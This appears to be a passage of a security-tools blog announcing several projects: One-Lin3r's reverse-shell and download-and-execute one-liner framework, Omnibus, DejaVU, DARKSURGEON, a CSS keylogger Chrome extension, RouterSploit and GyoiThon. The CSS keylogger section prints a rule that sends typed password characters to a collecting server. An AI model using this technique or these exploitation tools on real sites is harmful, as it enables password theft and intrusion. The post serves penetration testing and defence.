One-Lin3r v1.1 – Gives You One-Liners That Aids In Penetration Testing Operations

One-Lin3r is simple and light-weight framework inspired by the web-delivery module in Metasploit.It consists of various one-liners that aids in penetration testing operations:Reverser: Give it IP & port and it returns a reverse shell liner ready for copy & paste.Dropper: Give it an uploaded-backdoor URL and it returns a download-&-execute liner ready for copy & paste.Other: Holds liners with the general purpose to help in penetration testing (ex: Mimikatz, Powerup, etc…) on the trending OSes (Windows, Linux, and macOS) “More OSes can be added too".FeaturesSearch for any one-liner in the database by its full name or partially.You can add your own liners by following these steps to create a ".liner" file. Also, you can send it to me directly and it will be added in the framework and credited with your name .Autocomplete any framework command and recommendations in case of typos (in case you love hacking like movies ).Command line arguments can be used to give the framework a resource file to load and execute for automation.The ability to reload the database if you added any liner without restarting the framework.You can add any platform to the payloads database just by making a folder in payloads folder and creating a ".liner" file there.More…The payloads database is not big now because this the first edition but it will get bigger with updates and contributions.ScreenshotsUsageCommandline argumentsusage: one-lin3r [-h] [-r R] [-x X] [-q]optional arguments: -h, –help show this help message and exit -r Execute a resource file (history file). -x Execute a specific command (use ; for multiples). -q Quit mode (no banner).Framework commandsCommand Description——– ————-help/? Show this help menulist/show List payloads you can use in the Search payloads for a specific oneuse <payload> Use an available payloadinfo <payload> Get information about an available payloadbanner Display bannerreload/refresh Reload the payloads databasecheck Prints the core version and database version then check for them online.history Display command line most important history from the beginningsave_history Save command line history to a fileexit/quit Exit the frameworkInstalling and requirementsTo make the tool work at its best you must have :Python 3.x or 2.x (preferred 3).Linux (Tested on kali rolling), Windows system, mac osx (tested on 10.11)The requirements mentioned in the next few lines.Installing+For windows : (After downloading ZIP and upzip it)python -m pip install ./One-Lin3r-masterone-lin3r -h+For Linux :git clone install libncurses5-devpip install ./One-Lin3rone-lin3r -hUpdating the framework or the databaseOn Linux while outside the directorycd One-Lin3r && git pull && cd ..pip install ./One-Lin3r –upgradeOn Windows if you don’t have git installed, redownload the framework zipped!Download One-Lin3r


Omnibus – Open Source Intelligence Collection, Research, And Artifact Management

An Omnibus is defined as a volume containing several novels or other items previously published separately and that is exactly what the InQuest Omnibus project intends to be for Open Source Intelligence collection, research, and artifact management.By providing an easy to use interactive command line application, users are able to create sessions to investigate various artifacts such as IP addresses, domain names, email addresses, usernames, file hashes, Bitcoin addresses, and more as we continue to expand.This project has taken motivation from the greats that came before it such as SpiderFoot, Harpoon, and DataSploit. Much thanks to those great authors for contributing to the world of open source.The application is written with Python 2.7 in mind and has been successfully tested on OSX and Ubuntu 16.04 environments.As this is a pre-release of the final application, there will very likely be some bugs and uncaught exceptions or other weirdness during usage. Though for the most part, it is fully functional and can be used to begin OSINT investigations right away.VocabularyBefore we begin we’ll need to cover some terminology used by Omnibus.Artifact:An item to investigateArtificats can be created in two ways:Using the new command or by being discoverd through module executionSession:Cache of artifacts created after starting the Omnibus CLIEach artifact in a session is given an ID to quickly identify and retrieve the artifact from the cacheCommands can be executed against an artifact either by providing it’s name or it’s corresponding session IDModule:Python script that performs some arbitirary OSINT task against an artifactRunning OmnibusStarting up Omnibus for investigation is a simple as cloning this GitHub repository, installing the Python requirements using pip install -r requirements.txt and running python2.7 Omnibus Shell – Main StartupFor a visual reference of the CLI, pictured above is the Omnibus console after a new session has been started, 2 artifacts have been added to a session, and the help menu is shown.API KeysYou must set any API keys you’d like to use within modules inside the omnibus/etc/apikeys.json file. This file is a JSON ocument with placeholders for all the services which require API keys, and is only accessed by Omnibus on a per module basis to retrieve the exact API key a module needs to execute.It should be noted that most of the services requiring API keys have free accounts and API keys. Some free accounts may have lower resource limits, but that hasn’t been a problem during smaller daily investigations or testing the application.A handy tip: Use the cat apikeys command to view which keys you do in fact have stored. If modules are failing, check here first to ensure your API key is properly saved.Interactive ConsoleWhen you first run the CLI, you’ll be greeted by a help menu with some basic information. We tried to build the command line script to mimic some common Linux console commands for ease of use. Omnibus provides commands such as cat to show information about an artifact, rm to remove an artifact from the database, ls to view currently session artifacts, and so on.One additional feature of note is the use of the > character for output redirection. For example, if you wish to retrieve the details of an artifact named “" saved to a JSON file on your local disk you’d simply run the command: cat > inquest-report.json and there it would be! This feature also works with full file paths instead of relative paths.The high level commands you really need to know to use Omnibus are:session start a new sessionnew create a new artifact for investigationmodules display list of available modulesopen <file path> load a text file list of artifacts into Omnibus as artifactscat <artifact name | session id> view beautified JSON database recordsls show all active artifactsrm remove an artifact from the databasewipe clear the current artifact sessionAlso, if you ever need a quick reference on the different commands available for different areas of the application there are sub-help menus for this exact purpose. Using these commands will show you only those commands available relevant to a specific area:general overall commands such as help, history, quit, set, clear, banner, etc.artifacts display commands specific to artifacts and their managementsessions display helpful commands around managing sessionsmodules show a list of all available modulesArtifactsOverviewMost cyber investigations begin with one or more technical indicators, such as an IP address, file hash or email address. After searching and analyzing, relationships begin to form and you can pivot through connected data points. These data points are called Artifacts within Omnibus and represent any item you wish to investigate.Artifacts can be one of the following types:IPv4 addressFQDNEmail AddressBitcoin AddressFile Hash (MD5, SHA1, SHA256, SHA512)User NameCreating & Managing ArtifactsThe command "new" followed by an artifact will create that artifact within your Omnibus session and store a record of the artifact within MongoDB. This record holds the artifact name, type, subtype, module results, source, notes, tags, children information (as needed) and time of creation. Every time you run a module against a created or stored artifact, the database document will be updated to reflect the newly discovered information.To create a new artifact and add it to MongoDB for tracking, run the command new <artifact name>. For example, to start investigation the domain, you would run new will automatically determine what type the artifact is and ensure that only modules for that type are executed against the artifact.When a module is created, new artifacts may be found during the discovery process. For example, running the "dnsresolve" command might find new IPv4 addresses not previously seen by Omnibus. If this is the case, those newly found artifacts are automatically created as new artifacts in Omnibus and linked to their parent with an additional field called "source" to identify from which module they were originally found.Artifacts can be removed from the database using the "delete" command. If you no longer need an artifact, simply run the delete command and specify the artifacts name or the session ID if it has one.SessionsOmnibus makes use of a feature called "sessions". Sessions are temporary caches created via Redis each time you start a CLI session. Every time you create an artifact, that artifacts name is added to the Session along with a numeric key that makes for easy retrieval, searching, and action against the related artifact. For example if you’re session held one item of "", instead of needing to execute virustotal you could also run virustotal 1 and you would receive the same results. In fact, this works against any module or command that uses an artiface name as it’s first argument.Sessions are here for easy access to artifacts and will be cleared each time you quit the command line session. If you wish to clear the session early, run the command "wipe" and you’ll get a clean slate.Eventually, we would like to add a Cases portion to Omnibus that allows users to create cases of artifacts, move between them, and maintain a more coherent OSINT management platform. Though for this current pre-release, we will be sticking with the Session. 🙂 Interacting with Session IDs instead of Artifact names ModulesOmnibus currently supports the following list of modules. If you have suggestions or modules or would like to write one of your own, please create a pull request.Also, within the Omnibus console, typing the module name will show you the Help information associated with that module.ModulesBlockchain.infoCensysClearBitCymonDNS subdomain enumerationDNS resolutionDShield (SANS ISC)GeoIP lookupFull ContactGist ScrapingGitHub user email searchHurricane Electric host searchHIBP searchHunter.ioIPInfoIPVoidKeyBaseNmapPassiveTotalPastebinPGP Email and Name lookupRSS Feed ReaderShodanSecurity News ReaderThreatCrowdThreatExpertTotalHashTwitterURLVoidVirusTotalWeb ReconWHOISAs these modules are a work in progress, some may not yet work as expected but this will change over the coming weeks as we hope to officially release version 1.0 to the world!MachinesMachines are a simple way to run all available modules for an artifact type against a given artifact. This is a fast way if you want to gather as much information on a target as possible using a single command.To perform this, simply run the command machine <artifact name|session ID> and wait a few minutes until the modules are finished executing.The only caveat is that this may return a large volume of data and child artifacts depending on the artifact type and the results per module. To remedy this, we are investigating a way to remove specific artifact fields from the stored database document to make it easier for users to prune unwanted data.Quick Reference GuideSome quick commands to remember are:session – start a new artifact cachecat <artifact name>|apikeys – pretty-print an artifacts document or view your stored API keysopen <file path> – load a text file list of artifacts into Omnibus for investigationnew <artifact name> – create a new artifact and add it to MongoDB and your sessionfind <artifact name> – check if an artifact exists in the db and show the resultsReportingReports are the JSON output of an artifacts database document, essentially a text file version of the output of the "cat" command. But by using the report command you may specify an artifact and a filepath you wish to save the output to:omnibus >> report /home/adam/intel/osint/reports/inq_report.jsonThis above command overrides the standard report directory of omnibus/reports. By default, and if you do not specify a report path, all reports will be saved to that location. Also, if you do not specify a file name the report will use the following format:[artifact_name]_[timestamp].jsonRedirectionThe output of commands can also be saved to arbitrary text files using the standard Linux character >. For example, if you wish to store the output of a VirusTotal lookup for a host to a file called "vt-lookup.json" you would simply execute:virustotal > vt-lookup.jsonBy default the redirected output files are saved in the current working directory, therefore "omnibus/", but if you specify a full path such as virustotal > /home/adam/intel/cases/001/vt-lookup.json the JSON formatted output will be saved there.Monitoring ModulesOmnibus will soon be offering the ability to monitor specific keywords and regex patterns across different sources. Once a match is found, an email or text message alert could be sent to the user to inform them on the discovery. This could be leveraged for real-time threat tracking, identifying when threat actors appear on new forums or make a fresh Pastebin post, or simply to stay on top of the current news.Coming monitors include:RSS monitorPastebin monitorGeneric Pastesite monitoringGeneric HTTP/JSON monitoringDownload Omnibus


DejaVU – Open Source Deception Framework

Deception techniques if deployed well can be very effective for organizations to improve network defense and can be a useful arsenal for blue teams to detect attacks at very early stage of cyber kill chain. But the challenge we have seen is deploying, managing and administering decoys across large networks is still not easy and becomes complex for defenders to manage this over time. Although there are a lot of commercial tools in this space, we haven’t come across open source tools which can achieve this.With this in mind, we have developed DejaVu which is an open source deception framework which can be used to deploys across the infrastructure. This could be used by the defender to deploy multiple interactive decoys (HTTP Servers, SQL, SMB, FTP, SSH, client side – NBNS) strategically across their network on different VLAN’s. To ease the management of decoys, we have built a web based platform which can be used to deploy, administer and configure all the decoys effectively from a centralized console. Logging and alerting dashboard displays detailed information about the alerts generated and can be further configured on how these alerts should be handled. If certain IP’s like in-house vulnerability scanner, SCCM etc. needs to be whitelisted, this can be configured which effectively would mean very few false positives.Alerts only occur when an adversary is engaged with the decoy, so now when the attacker touches the decoy during reconnaissance or performs authentication attempts this raises a high accuracy alert which should be investigated by the defense. Decoys can also be placed on the client VLAN’s to detect client side attacks such as responder/LLMNR attacks using client side decoys. Additionally, common attacks which the adversary uses to compromise such as abusing Tomcat/SQL server for initial foothold can be deployed as decoys, luring the attacker and enabling detection.Video demo for tool is published here: Youtube URLArchitectureHost OS: Primary OS hosting the DejaVU virtual box. Note: Primaryhost can be OS independent Windows/Linux and can be based oncorporate hardening guidelines.DejaVu Virtual Box: Debian based image containing open source deception framework to deploy multiple interactive decoys (HTTP Servers, SQL, SMB, FTP, SSH, client side – NBNS).Networking Management Interface – An interface to access web based management console. (Recommended to be isolated from internal network.)Decoy Interface – Trunk/Access interface for inbound connections from different networks towards the interactive decoys. (Recommended to block outbound connections from this interface)Virtual Interfaces – Interfaces bridged with decoy interface to channel traffic towards the decoys.Server Dockers – Docker based service containers – HTTP(Tomcat/Apache), SQL, SMB, FTP, SSHClient Dockers – Docker based client container – NBNS clientManagement Console (Web + DB) – A centralized console to deploy, administer and configure all the decoys effectively along with logging and alerting dashboard to display detailed information about the alerts generated.Usage GuideInitial SetupConfigure Username/Password for admin panelphp config.php –username= –password=<provide password> –email=<provide email>Default URL to access admin panel – network adapter type should be “PCNet"(full name is something like PCnet-FAST III)Set SMTP configuration on "mailalert.php" to recieve Email alertsNow when you go to the default URL, you are greeted by the logon prompt:Add Server DecoyTo add a decoy, we first need to add a VLAN on which we want to later deploy Decoys.Select Decoy Management -> Add VLANEnter the VLAN ID. Use the “List Available VLANs” option to list the VLANs tagged on the interface.To add server decoy :Select Decoy Management ->Add Server DecoyProvide the details for new decoy as shown below. Select the services (SMB/FTP/MySQL/FTP/Web Server/SSH) to be deployed, use dynamic or provide a static IP address.Let’s do some port scan’s + Auth attempts from attacker machine on server VLAN and analyze the alertsView the alerts triggered when the attacker scanned our decoy and tried to authenticate.Select Log Management -> List EventsAdd Client DecoyTo add Client DecoySelect Decoy Management ->Add Client DecoyProvide the details for new decoy as shown below. It’s recommended to place the client decoy on user VLANs to detect responder/LLMNR attacks.Let’s run responder from attacker machine on end user VLAN and analyze the alertsView the alerts triggered when the attacker scanned our decoy and tried to authenticated.Log management -> List EventsFilter AlertsAlerts can be configured based on various parameters. Example – Don’t send alerts from IP – If certain IP’s like in-house vulnerability scanner, SCCM etc. needs to be whitelisted.To Do Code Cleanup and sanitization Persistance on reboot Add client side decoys generating HTTP, FTP traffic ISO image WikiAuthorsBhadresh Patel (@bhdresh)Harish Ramadoss (@hramados)Download DejaVU


DARKSURGEON – A Windows Packer Project To Empower Incident Response, Digital Forensics, Malware Analysis, And Network Defense

DARKSURGEON is a Windows packer project to empower incident response, digital forensics, malware analysis, and network defense.DARKSURGEON has three stated goals:Accelerate incident response, digital forensics, malware analysis, and network defense with a preconfigured Windows 10 environment complete with tools, scripts, and utilities. Provide a framework for defenders to customize and deploy their own programmatically-built Windows images using Packer and Vagrant.Reduce the amount of latent telemetry collection, minimize error reporting, and provide reasonable privacy and hardening standards for Windows 10.If you haven’t worked with packer before, this project has a simple premise:Provide all the tools you need to have a productive, secure, and private Windows virtual machine so you can spend less time tweaking your environment and more time fighting bad guys.Please note this is an alpha project and it will be subject to continual development, updates, and package breakage.Development PrinciplesDARKSURGEON is based on a few key development principles:Modularity is key. Each component of the installation and configuration process should be modular. This allows for individuals to tailor their packer image in the most flexible way.Builds must be atomic. A packer build should either complete all configuration and installation tasks without errors, or it should fail. A packer image with missing tools is a failure scenario.Hardened out of the box. To the extent that it will not interfere with investigative workflows, all settings related to proactive hardening and security controls should be enabled. Further information on DARKSURGEON security can be found later in this post. Instrumented out of the box. To the extent that it will not interfere with investigative workflows, Microsoft Sysmon, Windows Event Logging, and osquery will provide detailed telemetry on host behavior without further configuration.Private out of the box. To the extent that it will not interfere with investigative workflows, all settings related to privacy, Windows telemetry, and error reporting should minimize collection.HardeningDARKSURGEON is hardened out of the box, and comes with scripts to enable High or Low security modes.All default installations of DARKSURGEON have the following security features enabled:Windows Secure Boot is Enabled.Windows Event Log Auditing is Enabled. (Palantir Windows Event Forwarding Guidance)Windows Powershell Auditing is Enabled. (Palantir Windows Event Forwarding Guidance)Windows 10 Privacy and Telemetry are Reduced to Minimal Settings. (Microsoft Guidance)Sysinternals Sysmon is Installed and Configured. (SwiftonSecurity Public Ruleset)LLMNR is Disabled.NBT is Disabled.WPAD is Removed.Powershell v2 is Removed.SMB v1 is Removed.Application handlers for commonly-abused file extensions are changed to notepad.exe.Additionally, the user may specify a Low or High security mode by using the appropriate scripts. The default setting is to build an image in Low Security mode.Low Security mode is primarily used for virtual machines intended for reverse engineering, malware analysis, or systems that cannot support VBS security controls.In Low Security mode, the following hardening features are configured:Windows Defender Anti-Virus Real-Time Scanning is Disabled.Windows Defender SmartScreen is Disabled.Windows Defender Credential Guard is Disabled.Windows Defender Exploit Guard is Disabled.Windows Defender Exploit Guard Attack Surface Reduction (ASR) is Disabled.Windows Defender Application Guard is Disabled.Windows Defender Application Guard does not enforce isolation.Note: High Security mode is still in development.High Security mode is primarily used for production deployment of sensitive systems (e.g. Privileged Access Workstations) and may require additional tailoring or configuration.In High Security mode, the following hardening features are configured:Windows Defender Anti-Virus Real-Time Scanning is Enabled.Windows Defender SmartScreen is Enabled and applied to All Traffic.Windows Defender Credential Guard is Enabled.Windows Defender Exploit Guard is Enabled.Windows Defender Exploit Guard Attack Surface Reduction (ASR) is Enabled.Windows Defender Application Guard is Enabled.Windows Defender Application Guard enforces isolation.TelemetryWhether analyzing unknown binaries or working on sensitive projects, endpoint telemetry powers detection and response operations. DARKSURGEON comes pre-configured with the following telemetry sources available for analysis:Windows Event Log Auditing is enabled. (Palantir Windows Event Forwarding Guidance).Windows Powershell Auditing is enabled. (Palantir Windows Event Forwarding Guidance).Sysinternals Sysmon is installed and configured. (SwiftonSecurity Ruleset)PrivacyYour operational environment contains some of the most sensitive data from your network, and it’s important to safeguard that from prying eyes. DARKSURGEON implements the following strategies to maximize privacy without hindering workflows:Windows 10 telemetry settings are configured to minimize collection.Cortana, diagnostics, tracking, and other services are disabled.Windows Error Reporting (WER) is disabled.Windows Timeline, shared clipboard, device hand-off, and other synchronize-by-default applications are disabled or neutered. Microsoft Guidance for reducing telemetry and data collection has been implemented.PackagesOut of the box, DARKSURGEON comes equipped with tools, scripts, and binaries to make your life as a defender easier.Android Analysis:Tools, scripts, and binaries focused on android analysis and reverse engineering.APKTool (FLARE)Blue Team:Tools, scripts, and binaries focused on blue team, network defense, and alerting/detection development.ACEBloodhound / SharphoundCimSweepDumpsterfireEndGame Red Team Automation (RTA)KansaPosh-GitInvoke-ATTACKAPILOLBAS (Living Off the Land Binaries And Scripts)OSX CollectorPosh-SecModPosh-SysmonPowerForensicsPowerSploitPractical Malware Analysis Labs (FLARE)Revoke-ObfuscationYara (FLARE)Debuggers:Tools, scripts, and binaries for debugging binary artifacts.Ollydbg (FLARE)OllyDump (FLARE)OllyDumpEx (FLARE)Ollydbg2 (FLARE)OllyDump2Ex (FLARE)x64dbg (FLARE)Windbg (FLARE)Disassemblers:Tools, scripts, and binaries for disassembling binary artifacts.IDA Free Trial (FLARE)Binary Ninja Demo (FLARE)Radare2 (FLARE)Document Analysis: Tools, scripts, and binaries for performing analysis of documents.OffVis (FLARE)OfficeMalScanner (FLARE)PDFId (FLARE)PDFParser (FLARE)PDFStreamDumper (FLARE)DotNet Analysis:Tools, scripts, and binaries for performing analysis of DotNet artifacts.DE4Dot (FLARE)DNSpy (FLARE)DotPeek (FLARE)ILSpy (FLARE)Flash Analysis:Tools, scripts, and binaries for performing analysis of flash artifacts.FFDec (FLARE)Forensic Analysis:Tools, scripts, and binaries for performing forensic analysis on application and operating system artifacts.Amcache ParserAppCompatCache ParserIISGeolocateJLECmdLECmdJumpList ExplorerPECmdRegistry ExplorerRegshot (FLARE)Shellbags ExplorerTimeline ExplorerTSK (The Sleuthkit)VolatilityX-Ways Forensics Installer Manager (XWFIM)Hex Editors:FileInsight (FLARE)HxD (FLARE)010 Editor (FLARE)Java Analysis:JD-GUI (FLARE)Dex2JARNetwork Analysis:Burp FreeFakeNet-NG (FLARE)Wireshark (FLARE)PE Analysis:DIE (FLARE)EXEInfoPE (FLARE)Malware Analysis Pack (MAP) (FLARE)PEiD (FLARE)ExplorerSuite (CFF Explorer) (FLARE)PEStudio (FLARE)PEview (FLARE)Resource Hacker (FLARE)VirusTotal UploaderPowershell Modules:Active DirectoryAzure ManagementPesterPython Libraries:CryptographyHexdumpOLEToolsLXMLPandasPassivetotalPEFilePyCryptodomeScapyShodanSigmaVisual C++ for PythonVivisectWinAppDBGYara-PythonRed Team:GrouperInveighNmapPowershell EmpirePowerupSQLPSAttackPSAttack Build ToolResponderRemote Management:AWS Command Line (AWSCLI)OpenSSHPuttyRemote Server Administration Tools (RSAT)Utilities:1Password7ZipAdobe Flash PlayerAdobe ReaderAPI MonitorBleachbitBoxstarterBstringsChecksumChocolateyCmderContainers (Hyper-V)CurlCyber ChefDockerDotNet 3.5DotNet 4ExiftoolFLOSS (FLARE)GitGoLangGoogle ChromeGPG4WinHashcalcHashdeepHasherHashtabHyper-VIrfanviewJava JDK8Java JRE8JQJupyterKeepassMicrosoft EdgeMozilla FirefoxMozilla ThunderbirdNeo4j CommunityNodeJSNugetOffice365 ProPlusOpenVPNOsqueryPython 2.7QbittorrentRawCapSlackSublime Text 3Sysinternals SuiteTor BrowserUnixUtilsUPXVisual C++ 2005Visual C++ 2008Visual C++ 2010Visual C++ 2012Visual C++ 2013Visual C++ 2015Visual C++ 2017Visual Studio CodeWindows 10 SDKWindows Subsystem for Linux (WSL)WinlogbeatXorSearchXorStringsVisual Basic Analysis:VBDecompilerBuilding DARKSURGEONBuild ProcessDARKSURGEON is built using the HashiCorp application packer. The total build time for a new instance of DARKSURGEON is around 2–3 hours.Packer creates a new virtual machine using the DARKSURGEON JSON file and your hypervisor of choice (e.g. Hyper-V, Virtualbox, VMWare).The answers.iso file is mounted inside the DARKSURGEON VM along with the Windows ISO. The answers.iso file contains the unattend.xml needed for a touchless installation of windows, as well as a powershell script to configure Windows Remote Management (winrm).Packer connects to the DARKSURGEON VM using WinRM and copies over all files in the helper-scripts and configuration-files directory to the host.Packer performs serial installations of each of the configured powershell scripts, performing occasional reboots as needed. When complete, packer performs a sysprep, shuts down the virtual machine, and creates a vagrant box file. Additional outputs may be specified in the post-processors section of the JSON file.SetupNote: Hyper-V is currently the only supported hypervisor in this alpha release. VirtualBox and VMWare support are forthcoming.Install packer, vagrant, and your preferred hypervisor on your host.Download the repository contents to your host.Download a Windows 10 Enterprise Evaluation ISO (1803).Move the ISO file to your local DARKSURGEON repository.Update DARKSURGEON.json with the ISO SHA1 hash and file name.(Optional) Execute the powershell script New-DARKSURGEONISO.ps1 to generate a new answers.iso file. There is an answers ISO file included in the repository but you may re-build this if you don’t trust it, or you would like to modify the unattend files: powershell.exe New-DARKSURGEONISO.ps1Build the recipe using packer: packer build -only=[hyperv-iso|vmware|virtualbox] .\DARKSURGEON.jsonConfiguring DARKSURGEONDARKSURGEON is designed to be modular and easy to configure. An example configuration is provided in the DARKSURGEON.json file, but you may add, remove, or tweak any of the underlying scripts.Have a custom CA you need to add? Need to add a license file for IDA? No problem. You can throw any files you need in the configuration-files directory and they’ll be copied over to the host for you.Want to install a custom package, or need some specific OS tweaks? No worries. Simply make a new powershell script (or modify an existing one) in the configuration-scripts directory and add it as a build step in the packer JSON file.Using DARKSURGEONNote: Hyper-V is currently the only supported hypervisor in this alpha release. VirtualBox and VMWare support are forthcoming.Once DARKSURGEON has successfully built, you’ll receive an output vagrant box file. The box file contains the virtual machine image and vagrant metadata, allowing you to quickly spin up a virtual machine as needed.Install vagrant and your preferred hypervisor on your host.Navigate to the DARKSURGEON repository (or the location where you’ve saved the DARKSURGEON box file). Perform a vagrant up: vagrant upVagrant will now extract the virtual machine image from the box file, read the metadata, and create a new VM for you. Want to kill this VM and get a new one?Easy, just perform the following: vagrant destroy && vagrant upOnce the DARKSURGEON virtual machine is running, you can login using one of the two local accounts:Note: These are default accounts with default credentials. You may want to consider changing the credentials in your packer build.Administrator Account:Username: DarksurgeonPassword: darksurgeonLocal User Account:Username: UnprivilegedPassword: unprivilegedIf you’d rather not use vagrant, you can either import the VM image manually, or look at one of the many other post-processor options provided by packer.Downloading DARKSURGEONIf you’d rather skip the process of building DARKSURGEON and want to trust the box file I’ve built, you can simply download it here.ContributingContributions, fixes, and improvements can be submitted directly against this project as a GitHub issue or pull request. Tools will be reviewed and added on a case-by-case basis.Frequently Asked QuestionsWhy is Hyper-V the preferred hypervisor?I strongly believe in the value of Windows Defender Device Guard and Virtualization Based Security, which require the usage of Hyper-V for optimal effectiveness. As a result, other Hypervisors are not recommended on the host machine. I will do my best to accomodate other mainline hypervisors, but I would encourage all users to try using Hyper-V.Why does the entire packer build fail on a chocolatey package error?This was a design decision that was made to guarantee that all packages which were expected made it into the final packer build. The upside of this decision is that it guarantees all expected tools will be available in the finalized product. The downside is that additional complexity and fragility are inserted the build pipeline, as transient or chocolatey errors may cause a build to fail.If you wish to ignore this functionality, you are free to modify the underlying script to ignore errors on package installation.Does this project support using a Chocolatey Professional/Business/Consultant license?Yes. If you add your license file (named chocolatey.license.xml) to the configuration-files directory when performing a packer build, it will automatically be imported by the Set-ChocolateySettings.ps1 script. Please ensure that your usage of a chocolatey license adheres to their End-User License Agreement.Why are the build functions broken into dozens of individual powershell scriptsFlexibility is key. You may opt to use — or not use — any of these scripts, and in any order. Having individual files, while increasing project complexity, ensures that the project can be completely customized without issue.I want to debug the build. How do I do so?Add the Set-Breakpoint.ps1 script into the provisioner process at the desired point. This will cause the packer build to halt for 4 hours as it waits for the script to complete.TroubleshootingThe packer build process never starts and hangs on the UEFI screen.This is most likely a timing issue caused by the emulated key presses not causing the image to boot from the mounted Windows ISO. Restart your VM and hit any button a few times until the build process starts.Packer timed out during the build. I didn’t receive an error.Due to the size of the packages that are downloaded and installed, you may have exceeded the default packer build time limit.My VM is running, but packer doesn’t seem to connect via WinRM.Connect to the guest and check the following:WinRM is accessible from your packer host. (Test-NetConnection -ComputerName -Port 5985)WinRM is allowed on the guest firewall.I keep getting anti-virus, checksum, or other issues with Chocolatey. What gives?Unfortunately these packages can be a moving target. New updates can render the static checksum in the chocolatey package incorrect, anti-virus may mistakenly flag binaries, etc. Global chocolatey options can be specified to prevent these errors from occurring, but I will do my best to respond to bug reports filed as issues on underlying chocolatey packages.Download DARKSURGEON


CSS Keylogger – Chrome Extension And Express Server That Exploits Keylogging Abilities Of CSS

Chrome extension and Express server that exploits keylogging abilities of CSS.To useSetup Chrome extensionDownload repository git clone chrome://extensions in your browser (or open up the Chrome menu by clicking the icon to the far right of the Omnibox: The menu’s icon is three horizontal bars. and select Extensions under the More Tools menu to get to the same place).Ensure that the Developer mode checkbox in the top right-hand corner is checked.Click Load unpacked extension… to pop up a file-selection dialog.Select the css-keylogger-extension in the directory which you downloaded this repository.Setup Express serveryarnyarn startHaxking l33t passw0rdsOpen a website that uses a controlled component framework such as React. the extension C on the top right of any webpage.Type your password.Your password should be captured by the express server.How it worksThis attack is really simple. Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image.For example, the following css will select all input’s with a type that equals password and a value that ends with a. It will then try to load an image from http://localhost:3000/a.input[type=”password"][value$="a"] { background-image: url("http://localhost:3000/a");}Using a simple script one can create a css file that will send a custom request for every ASCII character.Download CSS Keylogger


RouterSploit v3.0 – Exploitation Framework For Embedded Devices

The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.It consists of various modules that aids penetration testing operations:exploits – modules that take advantage of identified vulnerabilitiescreds – modules designed to test credentials against network servicesscanners – modules that check if a target is vulnerable to any exploitpayloads – modules that are responsible for generating payloads for various architectures and injection pointsgeneric – modules that perform generic attacksInstallationRequirementsRequired:futurerequestsparamikopysnmppycryptoOptional:bluepy – bluetooth low energyInstallation on Kali Linuxapt-get install python3-pipgit clone routersploitpython3 -m pip install -r requirements.txtpython3 rsf.pyBluetooth Low Energy support:apt-get install libglib2.0-devpython3 -m pip install bluepypython3 rsf.pyInstallation on Ubuntu 18.04 & 17.10sudo add-apt-repository universesudo apt-get install git python3-pipgit clone -m pip install -r requirements.txtpython3 rsf.pyBluetooth Low Energy support:apt-get install libglib2.0-devpython3 -m pip install bluepypython3 rsf.pyInstallation on OSXgit clone routersploitsudo python3 -m pip install -r requirements.txtpython3 rsf.pyRunning on Dockergit clone routersploitdocker build -t routersploit .docker run -it –rm routersploitUpdateUpdate RouterSploit Framework often. The project is under heavy development and new modules are shipped almost every routersploitgit pullDownload RouterSploit


GyoiThon – A Growing Penetration Test Tool Using Machine Learning

GyoiThon is a growing penetration test tool using Machine Learning.GyoiThon identifies the software installed on web server (OS, Middleware, Framework, CMS, etc…) based on the learning data. After that, it executes valid exploits for the identified software using Metasploit. Finally, it generates reports of scan results. GyoiThon executes the above processing automatically.Processing steps GyoiThon executes the above “Step1" – "Step4" fully automatically.User’s only operation is to input the top URL of the target web server in GyoiThon.It is very easy!You can identify vulnerabilities of the web servers without taking time and effort.Processing flowStep 1. Gather HTTP responses.GyoiThon gathers several HTTP responses of target website while crawling.The following are example of HTTP responses gathered by GyoiThon.Example.1HTTP/1.1 200 OKDate: Tue, 06 Mar 2018 03:01:57 GMTConnection: closeContent-Type: text/html; charset=UTF-8Etag: "409ed-183-53c5f732641c0"Content-Length: 15271…snip…Example.2HTTP/1.1 200 OKDate: Tue, 06 Mar 2018 06:56:17 GMTConnection: closeContent-Type: text/html; charset=UTF-8Set-Cookie: f00e68432b68050dee9abe33c389831e=0eba9cd0f75ca0912b4849777677f587;path=/;Content-Length: 37496…snip…Example.3HTTP/1.1 200 OKDate: Tue, 06 Mar 2018 04:19:19 GMTConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 11819…snip…